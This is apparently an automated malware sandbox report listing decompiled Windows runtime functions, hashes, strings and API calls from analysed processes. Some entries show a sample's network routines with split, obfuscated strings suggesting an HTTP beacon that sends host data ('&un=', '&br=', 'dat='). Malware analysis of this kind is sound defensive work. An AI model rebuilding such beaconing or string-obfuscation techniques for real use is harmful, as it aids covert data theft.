• Opcode ID: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
• Instruction ID: 981150c3536c3a050b69dd4708f98fb73769ec028dfe72511bbc16febd22fefc
• Opcode Fuzzy Hash: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
• Instruction Fuzzy Hash: B8512671600711ABEB149F28CC81FA773ACFF94760F114229FD18DB281EAA5ED418BA0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E0090EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                        				signed int _v36;
                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                        				short _v66;
                                                                                                                                                        				char _v72;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                        				signed int _t44;
                                                                                                                                                        				void* _t46;
                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                        				signed char _t67;
                                                                                                                                                        				void* _t72;
                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                        				void* _t91;
                                                                                                                                                        				void* _t92;
                                                                                                                                                        				void* _t93;
                                                                                                                                                        
                                                                                                                                                        				_t80 = __edi;
                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                        				_t70 = __ecx;
                                                                                                                                                        				_t84 = _a4;
                                                                                                                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                        					E008FDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                        				}
                                                                                                                                                        				_push(0);
                                                                                                                                                        				__eflags = _t38 - 0xffffffff;
                                                                                                                                                        				if(_t38 == 0xffffffff) {
                                                                                                                                                        					_t39 =  *0x9c793c; // 0x0
                                                                                                                                                        					_push(0);
                                                                                                                                                        					_push(_t84);
                                                                                                                                                        					_t40 = E008E16C0(_t39);
                                                                                                                                                        				} else {
                                                                                                                                                        					_t40 = E008DF9D4(_t38);
                                                                                                                                                        				}
                                                                                                                                                        				_pop(_t85);
                                                                                                                                                        				__eflags = _t40;
                                                                                                                                                        				if(__eflags < 0) {
                                                                                                                                                        					_push(_t40);
                                                                                                                                                        					E00923915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                        					asm("int3");
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L21:
                                                                                                                                                        						_t76 =  *[fs:0x18];
                                                                                                                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                        							_v66 = 0x1722;
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_t76 =  &_v72;
                                                                                                                                                        							_push( &_v72);
                                                                                                                                                        							_v28 = _t85;
                                                                                                                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(0x10);
                                                                                                                                                        							_push(0x20402);
                                                                                                                                                        							E008E01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_t43 = _v8;
                                                                                                                                                        							_push(_t80);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							__eflags = _t43 - 0xffffffff;
                                                                                                                                                        							if(_t43 == 0xffffffff) {
                                                                                                                                                        								_t71 =  *0x9c793c; // 0x0
                                                                                                                                                        								_push(_t85);
                                                                                                                                                        								_t44 = E008E1F28(_t71);
                                                                                                                                                        							} else {
                                                                                                                                                        								_t44 = E008DF8CC(_t43);
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t44 - 0x102;
                                                                                                                                                        							if(_t44 != 0x102) {
                                                                                                                                                        								__eflags = _t44;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t44);
                                                                                                                                                        									E00923915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									E00962306(_t85);
                                                                                                                                                        									__eflags = _t67 & 0x00000002;
                                                                                                                                                        									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                        										_t7 = _t67 + 2; // 0x4
                                                                                                                                                        										_t72 = _t7;
                                                                                                                                                        										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                        										__eflags = _t67 - _t67;
                                                                                                                                                        										if(_t67 == _t67) {
                                                                                                                                                        											E0090EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									__eflags = _v24;
                                                                                                                                                        									if(_v24 != 0) {
                                                                                                                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                        									}
                                                                                                                                                        									return 2;
                                                                                                                                                        								}
                                                                                                                                                        								goto L36;
                                                                                                                                                        							}
                                                                                                                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                        							_push(_t67);
                                                                                                                                                        							_t46 = E00924FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                        							_push(_t77);
                                                                                                                                                        							E00933F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                        							_t48 =  *_t85;
                                                                                                                                                        							_t92 = _t91 + 0x18;
                                                                                                                                                        							__eflags = _t48 - 0xffffffff;
                                                                                                                                                        							if(_t48 == 0xffffffff) {
                                                                                                                                                        								_t49 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(_t49);
                                                                                                                                                        							_t50 = _v12;
                                                                                                                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                        							_push(_t85);
                                                                                                                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                        							E00933F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                        							_t53 =  *_t85;
                                                                                                                                                        							_t93 = _t92 + 0x20;
                                                                                                                                                        							_t67 = _t67 + 1;
                                                                                                                                                        							__eflags = _t53 - 0xffffffff;
                                                                                                                                                        							if(_t53 != 0xffffffff) {
                                                                                                                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t67 - 2;
                                                                                                                                                        							if(_t67 > 2) {
                                                                                                                                                        								__eflags = _t85 - 0x9c20c0;
                                                                                                                                                        								if(_t85 != 0x9c20c0) {
                                                                                                                                                        									_t76 = _a4;
                                                                                                                                                        									__eflags = _a4 - _a8;
                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                        										E0096217A(_t71, __eflags, _t85);
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							_push("RTL: Re-Waiting\n");
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push(0x65);
                                                                                                                                                        							_a8 = _a4;
                                                                                                                                                        							E00933F92();
                                                                                                                                                        							_t91 = _t93 + 0xc;
                                                                                                                                                        							__eflags =  *0x7ffe0382;
                                                                                                                                                        							if( *0x7ffe0382 != 0) {
                                                                                                                                                        								goto L21;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L36;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t40;
                                                                                                                                                        				}
                                                                                                                                                        				L36:
                                                                                                                                                        			}

































                                                                                                                                                        0x009424b0
                                                                                                                                                        0x009424b3
                                                                                                                                                        0x009424b9
                                                                                                                                                        0x009424ba
                                                                                                                                                        0x009424bb
                                                                                                                                                        0x009424c6
                                                                                                                                                        0x009424cb
                                                                                                                                                        0x009424cd
                                                                                                                                                        0x009424d0
                                                                                                                                                        0x009424d1
                                                                                                                                                        0x009424d4
                                                                                                                                                        0x009424d6
                                                                                                                                                        0x009424d9
                                                                                                                                                        0x009424d9
                                                                                                                                                        0x009424dc
                                                                                                                                                        0x009424df
                                                                                                                                                        0x009424e1
                                                                                                                                                        0x009424e7
                                                                                                                                                        0x009424e9
                                                                                                                                                        0x009424ec
                                                                                                                                                        0x009424ef
                                                                                                                                                        0x009424f2
                                                                                                                                                        0x009424f2
                                                                                                                                                        0x009424ef
                                                                                                                                                        0x009424e7
                                                                                                                                                        0x009424fa
                                                                                                                                                        0x009424ff
                                                                                                                                                        0x00942501
                                                                                                                                                        0x00942503
                                                                                                                                                        0x00942506
                                                                                                                                                        0x0094250b
                                                                                                                                                        0x0090eb8c
                                                                                                                                                        0x0090eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090eb99
                                                                                                                                                        0x0090ec85
                                                                                                                                                        0x0090ec85
                                                                                                                                                        0x0090ec85
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 009424FA
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0094248D
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009424BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
                                                                                                                                                        • Instruction ID: 79d3f361d88bd54194509c2bb0874614fe463adb0ee82fcb9406b4e0bbb3ffdb
                                                                                                                                                        • Opcode Fuzzy Hash: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
                                                                                                                                                        • Instruction Fuzzy Hash: 47410770A00204AFDB20DFA9DC89F6A77B9FF85720F208A15F555DB2D1D738E9418B61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction ID: 4e83bbbba3a2dd59214ac9b67b663ebc1daac38c6867af60d6e2911b4481eb6c
                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction Fuzzy Hash: 2C918D36F0020EEBDF24CF98C855AEEB7B8FF55305F20847AD451A61A2E7304A91CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0091FED6: ___swprintf_l.LIBCMT ref: 0091FEFD
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0094EA87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u$uuww
                                                                                                                                                        • API String ID: 48624451-599810794
                                                                                                                                                        • Opcode ID: abf74d54e38a88e250e4a8b6eb38a3c0853f84353677ab08a548d9bbb967d984
                                                                                                                                                        • Instruction ID: ca36570e09f8daf3049cdd33fd06b92038e726ff9819e9dcdbd2a31c0b2bc471
                                                                                                                                                        • Opcode Fuzzy Hash: abf74d54e38a88e250e4a8b6eb38a3c0853f84353677ab08a548d9bbb967d984
                                                                                                                                                        • Instruction Fuzzy Hash: 3211B47260021DEBCB10DEA9CC509EFB7ACFB54700B50492AF855C3251E774E9448BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Executed Functions

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getaddrinforecvsetsockopt
                                                                                                                                                        • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                                                                                                        • API String ID: 1564272048-2976227712
                                                                                                                                                        • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                        • Instruction ID: 614ce5d9bd288799c4a934e331670a1628c3a278d7b28e7f7aceb04c3b0a3f15
                                                                                                                                                        • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                        • Instruction Fuzzy Hash: CE627130718B188FD769EB68D484BEAB7E6FB94300F50492ED89BC7246DF30A545CB46
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: closesocket
                                                                                                                                                        • String ID: clos$esoc$ket
                                                                                                                                                        • API String ID: 2781271927-3604069445
                                                                                                                                                        • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                        • Instruction ID: 4eaa1a994ddf86487acba655224ceef92ef70d9178867bc14a61110cbe42647f
                                                                                                                                                        • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                        • Instruction Fuzzy Hash: BBF06D7021CB089BCB84DF1894887A9B7E0FB89314F94056DE88ECA205CB7885428782
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: closesocket
                                                                                                                                                        • String ID: clos$esoc$ket
                                                                                                                                                        • API String ID: 2781271927-3604069445
                                                                                                                                                        • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                        • Instruction ID: 209f27283c02f9f26b6281b2609451b9b7fb371988d9ac2f7b5c765f2caa0fa4
                                                                                                                                                        • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                        • Instruction Fuzzy Hash: 55F01D70618B089FCB84DF18D0C4759B7E0FB89314F54556DA84ECB245CB7485468B82
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: connect
                                                                                                                                                        • String ID: conn$ect
                                                                                                                                                        • API String ID: 1959786783-716201944
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: connect
                                                                                                                                                        • String ID: conn$ect
                                                                                                                                                        • API String ID: 1959786783-716201944
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: send
                                                                                                                                                        • String ID: send
                                                                                                                                                        • API String ID: 2809346765-2809346765
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: send
                                                                                                                                                        • String ID: send
                                                                                                                                                        • API String ID: 2809346765-2809346765
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: socket
                                                                                                                                                        • String ID: sock
                                                                                                                                                        • API String ID: 98920635-2415254727
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Executed Functions

                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B97,007A002E,00000000,00000060,00000000,00000000), ref: 0009820D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B97,007A002E,00000000,00000060,00000000,00000000), ref: 0009820D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(0=,?,?,00093D30,00000000,FFFFFFFF), ref: 00098315
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: 0=
                                                                                                                                                        • API String ID: 3535843008-3357461656
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(0=,?,?,00093D30,00000000,FFFFFFFF), ref: 00098315
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: 0=
                                                                                                                                                        • API String ID: 3535843008-3357461656
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A11,?,?,?,?,00093A11,FFFFFFFF,?,R=,?,00000000), ref: 000982B5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A11,?,?,?,?,00093A11,FFFFFFFF,?,R=,?,00000000), ref: 000982B5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

